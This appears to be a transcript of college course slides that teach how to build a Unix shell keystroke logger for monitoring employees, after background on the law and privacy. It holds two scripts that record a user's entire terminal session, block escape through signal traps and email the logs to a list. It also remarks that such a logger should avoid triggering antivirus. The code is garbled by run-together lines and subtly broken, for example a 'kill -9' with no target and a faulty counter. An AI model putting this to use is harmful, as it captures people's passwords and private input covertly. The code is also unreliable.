Creating a keystroke logger in unix shell scripting

CIS 216

Dan Morrill

Highline Community College

Creating a Keystroke Logger in Unix Shell

Scripting

While most companies will purchase software to do keystroke logging sometimes based on a court order, or a request/order from the legal department, or other party in the company, a system admin will be asked to record the keystrokes of an employee.

Keystroke Loggers are Illegal? Not Necessarily – companies can and often do keystroke log

their employees Courts in some jurisdictions have declined to take the step to

prohibit the surreptitious use of keyloggers, despite the apparent option to apply state legislation. This posture leaves individuals vulnerable to having their private information exploited by their employers. Given alternative methods of surveillance, lack of federal regulation, and advancing technology, extending state statutes is necessary and just. (Harvard Law, 2012)

Why would I want a Keystroke Logger?

Keylogging - Employers sometimes install keylogging programs that record every single keystroke you use on your computer. This allows them to see everything you are typing, including your passwords. The Stored Communication Act and Federal Wiretap Act, along with some state laws may offer limited protection, but so far most employers are getting away with this intrusive practice.

Email monitoring - Many companies have written policies saying the company can monitor your email. That means that they may look at your personal emails sent on company computers and devices, even if you used your personal email address.

Website monitoring - Your employer is almost certainly monitoring your internet usage. That means if you're checking out porn sites, visiting YouTube, updating Facebook, or doing your holiday shopping, your employer will know about it. You may be violating a company Internet usage policy. If you aren't working the hours you're paid for, the employer may well discipline you for your Internet usage. (AOL, 2012)

Employers do this

The Fourth Amendment applies whenever the government — whether local, state or federal — conducts a search or seizure. It protects you from an unreasonable search or seizure by any government official or agent, not just the police.

The Fourth Amendment does not protect you from privacy invasions by people other than the government, even if they later hand over what they found to the government — unless the government directed them to search your things in the first place. (EFF, 2006)

But what about my Right to Privacy?

The most common methods used to construct keylogging software are as follows:A system hook which intercepts notification that a

key has been pressed (installed using WinAPI SetWindowsHook for messages sent by the window procedure. It is most often written in C);

A cyclical information keyboard request from the keyboard (using WinAPI Get(Async)KeyState or GetKeyboardState – most often written in Visual Basic, sometimes in Borland Delphi);

Using a filter driver (requires specialized knowledge and is written in C). (SecureList, 2007)

How do Keyloggers Work?

Declare the variables:log_dir=/home/

current_user=$(whoami) log_time=$(date +%m%d%y%H%M%S)log_file="current_user$log_time"attempt="0"test_log_file="$log_file"

A quick keylogger (Example A)

Write the function:create_log()

{while [ -e $test_log_file ] # Checks for an existing file with the name found in $log_file.do # If $log_file is found, increment by one and try again. attempt="$attempt+1" test_log_file="$log_file""_$attempt"donelog_file="$test_log_file"touch $log_file # Once a viable filename has been found, this file is created.chmod 600 $log_file # Make $log_file writable for logging.}


Do the work close_log()

{if [ -e $log_file ] # Tests for the existence of $log_file.then echo "" >> $log_file echo "****************************************" >> $log_file echo "Logfile closing at $(date +%m%d%y%H%M%S)." >> $log_file # Adds final date/time entry to logelse echo "Test 3b" echo "Logfile did not exist. No record of keystroke logging exists." >> $log_file # If log does not exist, creates log and logs failure echo "Created $log_file to report this error." >> $log_file echo "Logfile created at $(date +%m%d%y%H%M%S)." >> $log_file echo "Logfile will now close."fichmod 400 $log_file # Guarantees log is left in read-only mode, even if trap triggered during logging.

kill -9 > /dev/null # Guarantees ending of this process.}


Trap the users input and create the logtrap 'close_log; exit 0' 1 2 3 4 5 6 7 8 9 10 11

12 13 14 15 16 17 18 19 20 26create_logscript $log_fileclose_logexit


Setup reporting via e-mail as a distro listLOG_MANAGER="logman" # List to e-mail

audit logLogman is the distro-email

A quick keylogger (Example B)

Setup the cleanup routine so no logs are left behind on the system being monitored cleanup_exit () # This will do the cleanup execute and exit function.

{# This function is executed on any type of exit except of course# a kill -9, which cannot be trapped. The script log file is# e-mailed either locally or remotely and the log file is # compressed. The last "exit" is needed so the user does not# have the ability to get to the command line without logging.

if [[ -s ${LOGDIR}/${LOGFILE} ]]then mailx -s "$TS - $LOGNAME Audit Report" $LOG_MANAGER \ < ${LOGDIR}/${LOGFILE} compress ${LOGDIR}/${LOGFILE} 2>/dev/null fi

exit}


Set the exit traptrap 'cleanup_exit' 1 2 3 4 5 6 7 8 9 10 11 12

13 14 15 16 17 18 19 20 26


Declare the variables TS=$(date +%m%d%y%H%M%S) # File time stamp

THISHOST=$(hostname|cut -f1-2 -d.) # This is the host name of this machine

LOGDIR=/home/ganesh/other/logger_files # Log files are saved on the logger files # automatically and also # This is the path that hold to the logs

LOGFILE=${THISHOST}.${LOGNAME}.$TS # Creates the name of the log file

touch $LOGDIR/$LOGFILE # Creates the actual file

set -o vi 2>/dev/null # Previous commands recall

# Set the command prompt export PS1="[THISHOST]@"'$PWD> '


Running parameterschmod 774 ${LOGDIR}/${LOGFILE} # giving full

control/permission to for the owner & Group # and read and write permissons to the other.

script ${LOGDIR}/${LOGFILE} # Start the script monitoring session

chmod 774 ${LOGDIR}/${LOGFILE} # Set permission to read, write and execute for the owner and group # and read and write permission to other.

cleanup_exit # Execute the cleanup and exit function


There is always more than one solutionSometimes you need to write a key logger

that is required for work, and you will not want to trigger an Anti-virus/malware response

Be careful – this is pretty cool, but leads to liability work if not suffencently covered by authorization from management

Questions?

Creating a keystroke logger in unix shell scripting

Education

Transcript of Creating a keystroke logger in unix shell scripting